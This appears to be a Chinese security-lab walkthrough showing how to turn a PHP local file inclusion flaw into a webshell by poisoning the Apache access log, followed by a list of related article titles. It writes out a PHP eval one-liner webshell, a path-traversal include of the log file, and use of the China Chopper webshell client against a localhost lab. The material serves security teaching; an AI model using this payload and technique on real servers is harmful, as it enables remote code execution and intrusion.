本地檔案包含之包含日誌獲取webshell
預備知識
程式開發人員通常會把可重複使用的函式寫到單個檔案中,在使用某些函式時,直接呼叫此檔案,無須再次編寫,這種呼叫檔案的過程稱為包含。
實驗目的
學會包含日誌獲取webshell
實驗工具
瀏覽器
實驗環境
客戶機一臺
實驗步驟
1、訪問127.0.0.1/FI/PHP_FI.php?filename=LFI.txt網頁顯示是檔案包含漏洞。
2.瀏覽器設定代理服務的步驟:點選網頁右上角,選擇【選項】---【高階】—【網路】—【設定】,選擇【手動配置代理】,輸入HTTP代理127.0.0.1,埠8080,清空不使用代理下方的文字框,點選確定。
3.重新整理瀏覽器的127.0.0.1/FI/PHP_FI.php?filename=<?php @eval($_POST[1]);?>網頁,burpsuite自動抓包,修改為如下。命令是<?php @eval($_POST[1]);?>
修改完畢,點選【Forward】按鈕。
4.雙擊桌面的【實驗工具】資料夾,雙擊開啟【中國菜刀】資料夾。找到【中國菜刀.exe】,並雙擊開啟。
空白處右擊,選擇【新增】。
輸入地址http://127.0.0.1/FI/PHP_FI.php?filename=../../../../../phpStudy/Apache/logs/access.log
相關文章
- 檔案包含漏洞(本地包含配合檔案上傳)
- 檔案包含之包含了Linux檔案描述符Linux
- 程式碼安全之檔案包含
- 檔案包含之/proc/self/environ
- 滲透測試之本地檔案包含(LFI)
- Shell 檔案包含
- 檔案包含2
- CTFer——檔案包含
- 檔案包含之銘感目錄
- 什麼是檔案包含漏洞?檔案包含漏洞分類!
- PHP本地檔案包含漏洞環境搭建與利用PHP
- PHP檔案包含 整理PHP
- 檔案包含漏洞示例
- 包含檔案(Include file)
- 遠端檔案包含shell
- PHP基礎---檔案包含PHP
- 檔案包含漏洞小結
- [web安全] 檔案包含漏洞Web
- Linux Shell檔案之間的包含關係Linux
- Win10如何獲取dump日誌檔案|windows10獲取dump檔案的步驟Win10Windows
- ClickOnce釋出包含某檔案
- PHP檔案包含小總結PHP
- "白話"PHP檔案包含漏洞PHP
- c26---檔案包含include
- Oracle 警告日誌 (alert log) 中包含哪些內容 ?Oracle
- 突破上傳之檔案包含漏洞以及修復方案
- Apache Tomcat檔案包含漏洞分析ApacheTomcat
- 檔案包含漏洞(繞過姿勢)
- 檔案包含漏洞檢測工具fimap
- 控制檔案包含哪些基本內容
- 利用pearcmd實現裸檔案包含
- 實戰篇——檔案包含漏洞一
- C語言 - 標頭檔案包含C語言
- c# sring \W1.235; 先判斷是否包含\W 如果包含 獲取\W和;之間的數C#
- 搜尋檔案下包含某個字串的檔案字串
- html檔案中包含其他檔案的方法大全HTML
- java Properties獲取本地檔案的變數Java變數
- 【第九章】檔案包含漏洞